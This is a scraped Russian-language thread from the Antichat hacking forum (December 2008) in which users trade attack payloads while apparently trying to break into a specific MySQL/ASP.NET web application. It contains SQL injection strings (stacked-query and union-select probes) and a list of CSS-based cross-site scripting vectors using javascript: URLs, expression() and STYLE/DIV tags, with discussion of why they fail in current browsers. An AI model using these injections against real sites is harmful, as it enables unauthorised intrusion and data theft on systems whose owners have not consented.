Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.12.2008, 17:45
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903
Репутация:
238
|
|
Сообщение от [Raz0r]
попробуй так:
1';CREATE PROC test AS SELECT 1;--sp_password
@Mixon
attr:expression() работает только в IE
background-image: url(javascript:alert()) должно везде работать
http://ha.ckers.org/xss.html
Блииин,ну вот сделай html докуменд с содержанием <span style="color:#00FF00;background-image:url(javascript :alert());">ttt</span> и открой,ничего же не пашет!!!
|
|
|
18.12.2008, 17:51
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903
Репутация:
238
|
|
Сообщение от iddqd
кажись уже давали эту ссылку:
http://www.inattack.ru/article/519.html
там насчет style 2 вектора есть, попробуй)
Как я и думал,точнейшие примеры из етого сайта по етому,вот
2. <DIV>. Данный тег служит контейнером для внутреннего текста. К тексту, который находится внутри тегов <div></div>, может быть применён определённый стиль (CSS). Вот пример использования данного тега для XSS атаки:
<DIV STYLE="background-image: url(javascript :alert('Я здесь был'))">
Как видите, здесь мы используем вставку кода в параметр STYLE. Но есть и ещё один вариант использования данного тега. Не с помощью функции url(), а через функцию expression():
<DIV STYLE="width: expression(alert('Я здесь был '));">
В данном случае тоже используется параметр STYLE.
3. <STYLE>. Данный тег задает правила оформления и форматирования элементов, находящихся внутри тегов <STYLE></STYLE>. Вот 2 варианта использования XSS:
<STYLE>.XSS{background-image:url("javascript :alert('Я здесь был ')");}</STYLE><A CLASS=XSS></A>
Здесь происходит следующее действие – сначала объявляется класс XSS(в нём расположен XSS- код), а затем он вызывается с помощью
<A CLASS=XSS></A>
Второй вариант:
<STYLE> type="text/css">BODY{background:url("javascript :alert(‘Я здесь был’)")} </STYLE>
В этом варианте наш XSS-код указывается как фоновое изображение странички.
И НЕОДИН ИЗ НИХ НЕ ПАШЕТ!(((
|
|
|
|
18.12.2008, 19:45
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Действительно, background:url(javascript:alert()) не работает. Тогда остается -moz-binding, который работает только в FF 2 и IE7, вот здесь даны примеры:
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/
|
|
|
|
18.12.2008, 19:48
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от Pashkela
1' union select 1,unhex(hex(version())),3
ты хоть думаешь, что пишешь? это MSSQL
|
|
|
|
18.12.2008, 20:15
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
ты хоть думаешь, что пишешь? это MSSQL
Это я уже понял. Вместо того, чтобы кричать, лучше бы решение дали. Иначе ваш пост несет смысловой нагрузки 0%
Кстати, вовсе не факт, что обязательно MSSQL
|
|
|
|
18.12.2008, 20:38
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
На сервере MySQL + ASP.NET
|
|
|
|
18.12.2008, 20:48
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
интересное сочетание...
@Pashkela
откуда ты знал? =)
|
|
|
|
18.12.2008, 22:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Ну что там Mysql и для меня удивление  Просто такие же ошибки встречаются и в Access и в Oracle, судя по гуглу |
|
|
|
18.12.2008, 23:12
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Просто такие же ошибки встречаются и в Access и в Oracle
да все верно, я пришел к выводу, что это ошибка характерна для ASP.NET, а не для конкретной RDBS
|
|
|
|
18.12.2008, 23:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Сообщение от Pashkela
Ну что там Mysql и для меня удивление Просто такие же ошибки встречаются и в Access и в Oracle, судя по гуглу 1)Ошибки не в бд, а в кодде веб приложения
2)Инжекту подвержены практически все виды бд 
поэтому удивляться тут нечему
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1001418){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1001429){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1001556){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1001877){kind=avatar}
Похожие темы
Линейный вид
